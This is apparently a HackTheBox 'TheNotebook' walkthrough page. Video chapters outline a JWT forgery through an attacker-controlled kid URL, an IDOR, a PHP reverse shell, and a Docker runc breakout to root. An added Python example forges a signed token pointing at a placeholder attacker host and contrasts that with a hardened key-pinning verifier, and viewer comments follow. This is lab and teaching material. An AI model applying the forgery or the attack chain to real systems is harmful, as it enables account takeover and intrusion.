HackTheBox - TheNotebook

00:00 - Intro
00:50 - Start of nmap
02:40 - Checking out the webpage, trying to identify the language running the page
03:50 - Exploring how Add Note works and testing for SSTI/SQLi/XSS
06:30 - Checking out the cookie to see how the JWT is encoded
07:30 - JWT.IO shows the JWT is RS256 and the header's kid field is a URL pointing at the private key (privKey)
08:30 - Editing the privKey URL in the JWT header by hand; I'm not sure why I didn't do this within the JWT.IO website...
10:00 - Confirming the server reaches out to us to fetch the private key from the URL we put in the header
10:45 - Using ssh-keygen/openssl to create an RSA key and forging the JWT (signed with our key, kid pointing at our host)
14:55 - Exploring the IDOR vulnerability to see if unauthenticated users can access notes
18:45 - Uploading a PHP file to confirm code execution, then a reverse shell
21:23 - Identifying when the box was created by looking at the SSH host key timestamps, then using find to list files created around that time
26:20 - My reverse shell keeps crashing, so doing the finds without the PTY trick to find a backup that has an SSH key
30:50 - SSH into the box with the SSH key and discovering we can use sudo to run Docker
31:40 - Exploring the Docker container for sensitive information that could be used to access other users on the box
34:25 - Looking at the Docker version, seeing it is from 2018, and finding a vulnerability
36:10 - Performing CVE-2019-5736 (runc container breakout via /proc/self/exe) to get root
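The JWT forgery at 07:30 to 10:45 comes down to one design mistake: the server reads a key location out of the unverified token header (the kid field) and fetches its verification key from there, so an attacker who hosts a key pair and signs with it can mint any claims. The block below is an added example written for this page, not code from the video or from the box. It implements RS256 with the standard library only (a toy 512-bit key, far too small for real use, keeps it fast), builds a legitimate token and a forged one, and runs both through a verifier that fetches by kid URL and a verifier that only treats kid as a name into a pinned key set. The URLs, the attacker host 10.10.14.1, the claim names username/admin_cap, and the dictionary standing in for the network are all assumptions; on the box the kid URL served a private key, and the verifier only needs the public half, so the stand-in maps each URL to a public key.

```python
"""Added example: forging an RS256 JWT when the verifier fetches its key from the
token's own kid URL, next to a verifier that pins keys.  Stdlib only; 512-bit RSA
is a toy size chosen only for speed."""
import base64
import hashlib
import json
import secrets


def _is_probable_prime(n, rounds=32):
    """Miller-Rabin, adequate for demo key generation."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_rsa_key(bits=512):
    """Return (n, e, d).  512 bits is insecure; it only keeps the demo fast."""
    e, half = 65537, bits // 2
    while True:
        p = q = 0
        while not _is_probable_prime(p):
            p = secrets.randbits(half) | (1 << (half - 1)) | 1
        while not _is_probable_prime(q):
            q = secrets.randbits(half) | (1 << (half - 1)) | 1
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and phi % e and n.bit_length() == bits:
            return n, e, pow(e, -1, phi)


_DIGESTINFO_SHA256 = bytes.fromhex("3031300d060960864801650304020105000420")


def _emsa(msg, k):
    """EMSA-PKCS1-v1_5 with SHA-256: the encoding RS256 actually signs."""
    t = _DIGESTINFO_SHA256 + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def rsa_sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(_emsa(msg, k), "big"), d, n).to_bytes(k, "big")


def rsa_verify(msg, sig, n, e):
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    return secrets.compare_digest(em, _emsa(msg, k))


def _b64u(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _unb64u(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def jwt_encode(header, payload, n, d):
    body = ".".join(_b64u(json.dumps(x, separators=(",", ":")).encode()) for x in (header, payload))
    return body + "." + _b64u(rsa_sign(body.encode(), n, d))


def jwt_parts(token):
    h, p, s = token.split(".")
    return json.loads(_unb64u(h)), json.loads(_unb64u(p)), _unb64u(s), h + "." + p


# Constructed stand-in for the network: the public key each kid URL would hand back.
SERVER_N, SERVER_E, SERVER_D = generate_rsa_key()
ATTACKER_N, ATTACKER_E, ATTACKER_D = generate_rsa_key()
KEY_URLS = {
    "http://localhost:7070/privKey.key": (SERVER_N, SERVER_E),       # the app's own key (assumed URL)
    "http://10.10.14.1:7070/privKey.key": (ATTACKER_N, ATTACKER_E),  # hypothetical attacker host
}
TRUSTED_KIDS = {"app-key-1": (SERVER_N, SERVER_E)}                   # hardened design: pinned keys


def verify_vulnerable(token):
    """Fetches the key from whatever URL the unverified header names (unknown URL = fetch
    failure = reject).  A token signed with an attacker-hosted key is accepted."""
    header, payload, sig, body = jwt_parts(token)
    kid = header.get("kid")
    if header.get("alg") != "RS256" or not isinstance(kid, str) or kid not in KEY_URLS:
        return None
    n, e = KEY_URLS[kid]   # the 'fetch': no allowlist, no pinning
    return payload if rsa_verify(body.encode(), sig, n, e) else None


def verify_hardened(token):
    """kid is only a name looked up in a pinned key set, never a location to fetch from."""
    header, payload, sig, body = jwt_parts(token)
    kid = header.get("kid")
    if header.get("alg") != "RS256" or not isinstance(kid, str) or kid not in TRUSTED_KIDS:
        return None
    n, e = TRUSTED_KIDS[kid]
    return payload if rsa_verify(body.encode(), sig, n, e) else None


def legit_token(kid):
    """What the app would issue; claim names are assumed, not taken from the box."""
    return jwt_encode({"typ": "JWT", "alg": "RS256", "kid": kid},
                      {"username": "guest", "admin_cap": 0}, SERVER_N, SERVER_D)


def forged_token(kid="http://10.10.14.1:7070/privKey.key"):
    """Attacker: point kid at our host and sign an admin payload with our own private key."""
    return jwt_encode({"typ": "JWT", "alg": "RS256", "kid": kid},
                      {"username": "admin", "admin_cap": 1}, ATTACKER_N, ATTACKER_D)


def tampered_token():
    """Edit the payload of a legit token but keep its old signature: rejected everywhere."""
    h, _p, s = legit_token("app-key-1").split(".")
    return ".".join((h, _b64u(b'{"username":"admin","admin_cap":1}'), s))
```

The tampered_token case is why editing the payload alone never works: the signature covers header and payload, so the only way past a correct verifier is to sign with the key it trusts. The vulnerable verifier lets the token choose that key; the hardened one keeps the key set server-side and uses kid purely as an index, which is also what blocks forged_token("app-key-1"), a forged token that names a trusted kid but is signed with the attacker's key.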
Comments

Man, the way you go through your boxes is kinda unique. Specifically the post-exploitation phase. Props as always

potatoonastick

Aww, "Java Web Token" was funny

daysling

Loved it! Even I overlooked the other enumeration holes that I left. I was looking forward to this video. Amazing. <3 Looking forward to making more submissions for the community!

mostwanted

Your method of forging keys was way easier than mine. I wrote a complete Python script that generated keys and gave me the cookie in base64 as output.

onlyastronut

love your videos, always learning from your guides - thanks

JuanBotes

Happy to see someone saying your name the right way. 👍🏻 ippsec

Iamnoahfranklin

Great video. I have solved this box but I used another method to get root. Found this one pretty nice. Always looking forward to your videos to learn and grow. <3

infosec

Great video...❤️ But still waiting for Zap...😝 What happened??😏 You don't like it...??🤗

yamunaudayanthi

at 6:02 - If you right-click in the Inspector -> Edit as HTML, you'll see the encoding that you were expecting to see. Most browsers unencode it for readability, so I use that trick a lot.

ASoggySandal

Wondering if it not showing up as HTML-entity encoded in the inspector is because you may need to edit as HTML to see the pre-rendered output? Big fan and sponsor btw.

hontar

Great video! Big fan, hope to hug you someday

pzz

Hey, do you have a Discord or something to interact with you and your community? I'm like a beginner/intermediate in cybersecurity and would love to learn about new topics and interact with other people from the same field :)

Filmer

As a new watcher, this was like magic. How do you copy and paste into vi??

BennyM

PLEASE... write up HTB "Under Construction"... the available material is all much too ambiguous. Thanks!

blackthorne-rose

I do not get how you directly changed the header and sent it to the server. Isn't the signature part used to check whether the token has been changed or not?

aaryanbhagat

Sir, may I ask why your website is under the .rocks domain? I misspelled your domain a couple of times; all of them (ipsec, ipsecc and ipssec) seem to be some kind of malicious domain. Are you aware of that? Isn't there something you could do about it?

Cyberghst_

24:03 My shell died. That's rude. 😂 😂 😂

maxxroach

No one would implement JWT verification like this 😂

caseylgoodrich

How do you get this machine? I find it on Hack The Box but I don't get it. Can you please tell me 🙏

mayurahir